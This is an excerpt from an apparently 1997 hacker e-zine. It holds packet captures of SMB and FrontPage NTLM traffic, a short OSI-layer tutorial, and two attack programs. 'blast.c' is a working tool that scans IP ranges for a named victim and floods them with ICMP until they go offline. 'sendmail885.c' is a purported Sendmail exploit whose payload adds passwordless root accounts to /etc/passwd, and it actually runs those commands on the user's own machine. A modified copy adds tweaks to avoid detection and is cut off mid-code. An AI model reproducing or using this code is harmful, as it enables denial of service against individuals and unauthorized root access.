TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 176 (0x00B0)
NBT: SS: Session Message, Len: 172
NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0)
NBT: .......0 = Add 0 to Length
NBT: Packet Length = 172 (0xAC)
NBT: SS Data: Number of data bytes remaining = 172 (0x00AC)
SMB: R transact TransactNmPipe (response to frame 26)
SMB: SMB Status = Error Success
SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 448 (0x1C0)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact
SMB: Word count = 10
SMB: Word parameters
SMB: Total parm bytes = 0
SMB: Total data bytes = 116
SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 56 (0x38)
SMB: Parameter Displacement = 0 (0x0)
SMB: Data bytes = 116 (0x74)
SMB: Data offset = 56 (0x38)
SMB: Data Displacement = 0 (0x0)
SMB: Max setup words = 0
SMB: Byte count = 117
SMB: Byte parameters
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: Data: Number of data bytes remaining = 116 (0x0074)
MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Response
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 116 (0x74)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 25 (0x19)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 92 (0x5C)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Cancel Count = 0 (0x0)
MSRPC: Reserved = 0 (0x0)
MSRPC: Stub Data
R_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..)
R_SRVSVC: LPSERVER_INFO InfoStruct {..}
R_SRVSVC: Switch Value = 101 (0x65)
R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..}
R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4)
R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48)
R_SRVSVC: DWORD sv101_version_major = 4 (0x4)
R_SRVSVC: DWORD sv101_version_minor = 0 (0x0)
R_SRVSVC: DWORD sv101_type = 266251 (0x4100B)
R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64)
R_SRVSVC: LPTSTR sv101_name = 204.73.131.11
R_SRVSVC: LPTSTR sv101_comment =
R_SRVSVC: Return Value = 0 (0x0)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00 ..O.....O.....E.
00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49 ..<.@....`.I...I
00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18 .....(.....`%oP.
00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00 ..|........SMB%.
00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00 .....|.......t..
00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75 ...8...t.8.....u
00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00 .H........t.....
00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF ..\.......e...0.
00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00 ......H.........
000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00 ......d.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
000E0: 16 00 00 00 00 00 ......


Frontpage Sniff:
Below you notice the NTLM authentication process and that an application called
X-vermeer-urlencoded is the utility that is encrypting our LM password. An option
within IIS "
Windows NT Challeng/Response" is turned on in the following example.


21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.389
FRAME: Time delta from previous physical frame: 2 milliseconds
FRAME: Frame number: 21
FRAME: Total frame length: 433 bytes
FRAME: Capture frame length: 433 bytes
FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C8F
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 433 (0x01B1)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3)
IP: ID = 0xB805; Proto = TCP; Len: 419
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 419 (0x1A3)
IP: Identification = 47109 (0xB805)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xA296
IP: Source Address = 204.73.131.18
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 399 (0x018F)
TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80
TCP: Source Port = 0x0474
TCP: Destination Port = Hypertext Transfer Protocol
TCP: Sequence Number = 705525 (0xAC3F5)
TCP: Acknowledgement Number = 4115388 (0x3ECBBC)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8760 (0x2238)
TCP: Checksum = 0xA8FF
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 379 (0x017B)
HTTP: POST Request (from client using port 1140)
HTTP: Request Method = POST
HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll
HTTP: Protocol Version = HTTP/1.0
HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT
HTTP: MIME-Version = 1.0
HTTP: User-Agent = MSFrontPage/3.0
HTTP: Host = 204.73.131.19
HTTP: Accept = auth/sicily
HTTP: Content-Length = 62
HTTP: Content-Encoding = x-vermeer-1
HTTP: Content-Type = application/x-vermeer-rpc
HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc
HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type
HTTP: Undocumented Header Value = application/x-vermeer-rpc
HTTP: Data: Number of data bytes remaining = 62 (0x003E)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00 ..O.....O.....E.
00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49 ....@......I...I
00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18 ...t.P.....>..P.
00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69 "
8....POST /_vti
00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75 _bin/_vti_aut/au
00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E thor.dll HTTP/1.
00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31 0..Date: Mon, 01
00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A Dec 1997 23:57:
00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72 10 GMT..MIME-Ver
00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D sion: 1.0..User-
000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61 Agent: MSFrontPa
000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30 ge/3.0..Host: 20
000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63 4.73.131.19..Acc
000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79 ept: auth/sicily
000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 ..Content-Length
000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E : 62..Content-En
00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65 coding: x-vermee
00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 r-1..Content-Typ
00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 e: application/x
00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D -vermeer-rpc..X-
00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D Vermeer-Content-
00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F Type: applicatio
00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D n/x-vermeer-rpc.
00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39 ....2}.........9
00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79 .......9...#..Ay
00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3 ..Ex..AP..G..U}.
001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28 ......#.......y(
001B0: B1 .


If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session,
is responded to with an accesss denied HTTP frame:

23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.392
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 23
FRAME: Total frame length: 224 bytes
FRAME: Capture frame length: 224 bytes
FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C8F
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 224 (0x00E0)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2)
IP: ID = 0xC126; Proto = TCP; Len: 210
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 210 (0xD2)
IP: Identification = 49446 (0xC126)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x9A46
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.18
IP: Data: Number of data bytes remaining = 190 (0x00BE)
TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140
TCP: Source Port = Hypertext Transfer Protocol
TCP: Destination Port = 0x0474
TCP: Sequence Number = 4115388 (0x3ECBBC)
TCP: Acknowledgement Number = 705904 (0xAC570)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8381 (0x20BD)
TCP: Checksum = 0xD958
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 170 (0x00AA)
HTTP: Response (to client using port 1140)
HTTP: Protocol Version = HTTP/1.0
HTTP: Status Code = Unauthorized
HTTP: Reason = Access Denied
HTTP: WWW-Authenticate = NTLM
HTTP: WWW-Authenticate = Basic realm="204.73.131.19"
HTTP: Content-Length = 24
HTTP: Content-Type = text/html
HTTP: Data: Number of data bytes remaining = 24 (0x0018)
00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I
00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP.
00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4
00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied
00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica
00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au
00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi
00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73.
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"
..Content
000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con
000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/
000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A
000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.




[Basic Network Architecture, Part II...................................lurk3r]


In the last issue I covered the Basic of Layers and the way the communicate
with each other. In this article I will get more into each specific layer.
This is not going to be a huge layer. I had previously thought of doing a
long series on network architecture,but decided against it and to head more
in the direction of H/P although I did want to at least cover this last topic
for the sake of completeness.

The Physical Layer:

The physical layer is mostly related to transmitting raw data over a
communication channel. The designing issues of this layer mostly have to do
with making sure that when one side sends a bit, such as a 0 ,that the other
side also recieves it as a 0 and not a 1. The questions here are how many
volts should be used to represent a 0 and how many for a 1. How many
microseconds a bit occupies, whether transmission may continue simutaneously
in both directions, how the initial connection is established and how it is
stopped when both sides are finished. In some cases a transmission facility
consists of multiple physical channels,in which case the physical layer can
make them look like a single channel, although higher layers can also perform
this function.

The Data Link Layer:

The task of the Data Link Layer is to make a raw transmission facility and
transform it intoa line that appears free of transmission errors to the
network layer. It does this task by breaking the input up in data frames,
trans mitting the frames sequentially, and processing the acknowledgement
frames sent back by the reciever. Since layer 1 accepts and transmits a stream
of bits without any regar to meaning or structure, it is up to the data link
layer to create a recognize frame boundaries.This can be done by attaching
special bit patterns to the begginning and the end of the frame. The term
"frame" is not the official term for the unit exchanged by layer 2 peer
processes. The correct term is "physical-layer-service-data-unit". An issue
that arises at layer 2 (and higher layers as well) is how to keep a fast
transmitter from drowning a slower reciever of data. Some mechanism must be
employed to let the transmitter know how much buffer space the reciever has
at the moment. Typically this mechanism and the error handling are integrated
together. If the line can be used to transmit data in both directions, this
introduces a new complication that the data link layer software must software
must deal with.

The Network Layer:

The Network Layer, sometimes called the communication subnet layer, controls
the operation of the subnet. Among other things it determines the
characteristics of the IMP-host interface, and how packets, the units of
information exchanged in layer 3, are routed within the subnet. A major
design issue here is the devision of labor between the IMPs and hosts, in
particular who should ensure all packets are correctly recieved at their
destinations and in the proper order. What this layer of software does is
accept messages from the source host, convert them to packets, and see to it
that the packets get directed toward the destination. A key design issue here
is how the route is determined. It could be based on statis tables that are
"wired into" the network and rarely changed. It could also be determined at
the start of each conversation.

The Transport Layer:

The basic function of the transport layer, also known as the host-host layer,
is to accept data from the session layer, split it up into smaller units, if
need be, pass it to the network layer, and ensure that the pieces all arrive
correctly at the other end. Also this must be done in the most efficient way
possible, and in a way that isolates the sessions layer from the inevitable
changes of hardware technology. Under normal conditions the transport layer
creates a distinct network (layer 3) connection for each transport (layer 4)
connection required by the session layer. In addition to multiplexing several
message streams onto one physical channel (the host-IMP channel), the
transport layer must take care of establishing and disconnectiong connections
across the network. Although the network architecture specifies nothing about
the implementation, it is good to know that the transport layer is often
implemented by a part of the host operating system, which is known as the
transport station.

The Session Layer:

The session layer is the users interface into the network. It is with this
layer that the user must negotiate to establish a connection with a process
on some other machine. Once the connection has been established the session
layer can manage the dialog in an orderly manner, if the user has requested
that service. A connection between users is usually called a session. A
session might be to allow a user to log into a remote system or transfer a
file betweeen the machines. Another functions of the session layer is
management of the session once it has been setup. In some networks the
session and transport layers are merged into a single layer, or the
sessions layer is absent all together, if all the user wants is raw
communication service.

The Application Layer:

The content of the application layer us up to the individual user. When two
user programs on different machines communicate, they alone determine the st
of allowed messages and the action taken upon receipt of each. There are
still many issues that occur here, for example network trasparency, hiding the
physical distribution of resources from the user.

There are many other layers than the ones that I have introduced here. It all
depends on tailoring them to your needs on the basis of what your network
will be used for (i.e. business, isp, games net) and who it will be used by
(i.e. just you, friends or half of irc)

As I said this will probably be the last article on this and related areas,
unless I get enough mail about it. If you wish to know more on networks
architecture, mail me and ill see about possibly covering more areas. Direct
all comments and corrections to lurk3r@earthlink.net


Shout outs: #Virii (the old school fellaz and some of the new) #Phreak
(cause its the only decent phreak channel ive been able to find...heh) ,
Fa-q ( be more careful next time ) , Iczer (where is your article?),
memor (hey!), Scud (Quit faking u got a life and come hang with the fellaz)
and jlb (mail me some rollz).


EOF

[blast.c................................................................memor]

/***a hardcore blaster by memor/hbs-sjta 1997***

IMPORTANT NOTE: This program should only be used by AOL kiddies and lamers
because personally I think that DoS attacks are lame.

What does it do?

The program checks a range of ip addresses and when it finds your enemy's
ident, it kills him with five ICMPs of the packet size you want. After the
ICMP, it checks if the person is dead.
- If the person is dead, it continues scanning the dialups forever (while(1))
to see if the dude didn't switched to another one.. (stop it with ctrl-c)
- If the person is not dead, it will ICMP him again and again, hopefully
resulting in an eventual kill.

What do you use it?

-DEMO-
(woo~)$cc -o blast blast.c
(woo~)$blast
-*-A hardcore blaster for aol kidz by memz/hbs-sjta -1997-
-*-ident of the victim please:fuckerlame
-*-(isp) ip.ip.ip of the victim please:195.155.38
-*-Packet Size of ICMP (will be *5):5000
Scanning 195.155.38.1 - -/-Now Closing Connection..
Scanning 195.155.38.2 - -/-Now Closing Connection..
(...)
Scanning 195.155.38.255 - -/-Now Closing Connection..
Scanning 195.155.38.1 - -/-Now Closing Connection..
Scanning 195.155.38.2 - -/-Now Closing Connection..
(...)
control + c when you want it to end..

How do you protect against it?

For the poor people getting blasted by this...

Change ident regularly.. (your eleet++ pirch/mirc options)
or Run linux..
or Don't run an ident.. but somes ircd will want it, so you could be screwed
or Write the root of the isp ICMPing you about your being victimized

In conclusion...

If you want to improve the program do it.. first off, reduce the bugs because
I don't check any strlen of data strings (the ones that you fill with the
scanf for instance..).

Secondly, before connecting the host, I don't ping it.. you could do that to
speed up the scanning procedure.

Thirdly, put the global vars in local, 'cause global is kinda lame, but I'm
lazy#!@

Fourthly, if you are some lamer who knows some root bugtraq exploits, add in
the line sprintf(...,"ping -c %s ....",...); a -f for more blasting
efficiency.. it would give sprintf(...,"ping -f -c %s ...",...);

Lastly, programming a companion attacker to do several different types of DoS
attacks at once would be interesting.

Have fun..
memor
*/


/* includes for sockets, present,... */

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>

/* Global vars because I'm too lazy to transmit parameters between functions */

FILE *soc;
int sock;
int cmpt;
char varident[255];
char iptoshoot[255];
char tailleicmp[25];
char varip[255];
char query[1024];
char Buffer[1024];
struct sockaddr_in ip;
struct hostent *hos;

/* functions used */

void answer();
void scanning();
void choiceipicmpident();
void icmpip();
int ishealive();

/* main function */

void main()
{
choiceipicmpident();
scanning();
}

/* choosing ident, ip.ip.ip and packetsize to blast the potential victim... */

void choiceipicmpident()
{
printf("-*-Some hardcore blaster for aol kidz by memz/hbs-sjta -1997-\n");
printf("-*-ident of the victim please:");
scanf("%s",varident);
printf("-*-(isp) ip.ip.ip of the victim please:");
scanf("%s",varip);
printf("-*-Packet Size of icmp (will be *5):");
scanf("%s",tailleicmp);
}

/* scanning functions.. scan forever for the victim, and when found, call icmpip() */

void scanning()
{
cmpt=0;
while(1)
{
cmpt++;
if(cmpt==255) cmpt=1;
sprintf(iptoshoot,"%s.%d",varip,cmpt);
printf("Scanning %s - ",iptoshoot);
hos = gethostbyname(iptoshoot);

bzero((char *)&ip,sizeof(ip));
bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length);
ip.sin_family=hos->h_addrtype;
ip.sin_port=htons(113);

if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket");
}
else
{
if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) > -1 )
{
printf("-/-Querying IP,Ident Port..\n");

sprintf(query,"1,1\n\0");
if ( send(sock, query, strlen(query), 0) < 0 )
{
perror("send");
exit(1);
}
printf("-/-Query sent\n");
answer();
printf("-/-Receive Analysis:\n");
printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]);
printf("-/-Is he the person to Kill? ->");
if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0)
{
printf(" He is the person to Kill..\n");
icmpip();
}
else
{
printf(" Bad Target, back to scanning\n");
}
}
printf("-/-Now Closing Connection..\n");
close(sock);
}
}
}

/* icmpip() function called by scanning() one will ICMP the victim and after
5 mins waiting (you can reduce the wait time, I guess.. lame sleep(int)
hm..), calling function ishealive() to see if the "blast" was effective.. and
ICMP again and again if it wasn't.. */


void icmpip()
{
int killed;
int cpt;
char commande[1024];
killed=0;
do
{
sprintf(commande,"ping -c 50 -s %s %s &",tailleicmp,iptoshoot);
for(cpt=0;cpt<5;cpt++) system(commande);
sleep(5*60);
killed=ishealive();
}while(killed==0);
}

/* function called by icmpip() one and return 0 if the victim is not dead to
make the function icmpip() continue to try to kill and return 1 if the victim
was dead, for scanning() continues */


int ishealive()
{
int killen;
killen=0;
hos = gethostbyname(iptoshoot);

bzero((char *)&ip,sizeof(ip));
bcopy(hos->h_addr,(char *)&ip.sin_addr,hos->h_length);
ip.sin_family=hos->h_addrtype;
ip.sin_port=htons(113);

if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket");
}
else
{
if(connect(sock,(struct sockaddr *)&ip,sizeof(struct sockaddr)) < 0 )
{
printf("-/-Target DEAD, back to scanning@#\n");
killen=1;
}
else
{
printf("-/-Querying IP,Ident Port..\n");
sprintf(query,"1,1\n\0");
if ( send(sock, query, strlen(query), 0) < 0 )
{
perror("send");
exit(1);
}
printf("-/-Query sent\n");
answer();
printf("-/-Receive Analysis:\n");
printf("-/-Target...->%s<- . Current..->%s<-\n",varident,&Buffer[strlen(Buffer)-strlen(varident)]);
printf("-/-Is he the person to Kill? ->");
if(strcmp(varident,&Buffer[strlen(Buffer)-strlen(varident)])==0)
{
printf(" Target STILL ALIVE, CONTINUE ICMP@#\n");
killen=0;
}
else
{
printf(" Target DEAD, back to scanning@#\n");
killen=1;
}
}
printf("-/-Now Closing Connection..\n");
close(sock);
}
return killen;
}

/* function answer, only receive the identd server answer in a lame global
var.. */


void answer()
{
int i;
char ch;
soc=fdopen(sock, "r");
i=0;
do
{
ch=getc(soc);
Buffer[i]=ch;
i++;
}
while(ch!='\r' && ch!=-1);
Buffer[i-1]='\0';
fclose(soc);
}

/* good luck.. memor 1997 for thtj18 */

[sendmail885.c...........................................................su1d]

/* carparts original k0d3d by su1d */
/* yeah like, we get k-rad on your */
/* fuckin ass's, and like you must */
/* be root in order to open up */
/* privladged ports, so like su */
/* root whores. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* DO NOT CHANGE - SIZE COMPUTED */
char shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";

/* DO NOT CHANGE - SIZE COMPUTED */
char commands[] =
"/bin/echo \"n0tr00t::1000:1000:n0tr00t:/:/bin/bash\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/bash\" >> /etc/passwd\n";


int main
(
int argc,
char **argv
)
{
int i;
int sock;
char *ptr;
char *clear;
char buf[8192];
struct sockaddr_in sin;
struct hostent *hp;
if(argc<2)
{
printf("READ COMMENTS\n");
exit(-1);
}
ptr = buf;
for(i=0;i<=4096;i++) buf[i] = NOP;
ptr += i;
memcpy(ptr,shellcode,sizeof(shellcode));
ptr += sizeof(shellcode);
clear = commands;
memcpy(ptr,clear,sizeof(commands));
ptr += sizeof(commands);
memcpy(ptr,"3824",4);
system(clear);
printf("CONNECTING TO %s\n",argv[1]);
hp = gethostbyname(argv[1]);
if(hp==NULL)
{
printf("UNKNOWN HOST\n");
exit(-1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
"/bin/echo \"heh | mail Banshee@evil-empire.com";
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
send(sock,buf,sizeof(buf),0);
close(sock);
printf("
EXPLOIT SUCCESSFULLY EXECUTED\n");
return(0);
}

[sendmail885.c (2)......................................................scud_]

Note: Read the header. This code is all based on su1d's original
code, but modified slightly for user friendlyness, and less of a risk
of discovery.

/* sendmail885.c
* Sendmail 8.8.5 remote/local (if you use localhost for the host)
* exploit. Could be exploitable on other versions.
*
* carparts original code by su1d
*
* Modified slightly by scud_ <scud@thtj.com>
* - Fixed a few things I felt might get you discovered very fast
* - Also made this program a wee bit more user friendly
*
* Try gcc -o sendmail885 sendmail885.c to get this to compile
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* DO NOT CHANGE - SIZE COMPUTED */
char shellcode[] =
"
\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"
\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"
\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";

/* DO NOT CHANGE - SIZE COMPUTED */

/* Carparts original set the shell to /bin/bash, I changed this to
tcsh, since tsch doesnt have a log, but all of this *really* doesnt matter
much. However, a sysadmin seeing a .bash_history file in / would not be a
good thing. You could also just ln the history file to /dev/null */

/* Carparts original set the 2 new accounts to 'n0tr00t' and 'r00t'. This
may be fine, but if a sysadmin did a who list and sees that, what do you
think his next command will be? I left the r00t, but modded n0tr00t to
stephen, since stephen sounds like such an innocent user. */

char commands[] =
"
/bin/echo \"stephen::1000:1000:Stephen:/:/bin/tcsh\" >> /etc/passwd\n"
"
/bin/echo \"r00t::0:0:r00t:/:/bin/tcsh\" >> /etc/passwd\n";

int main
(
int argc,
char **argv
)
{
int i;
int sock;
char *ptr;
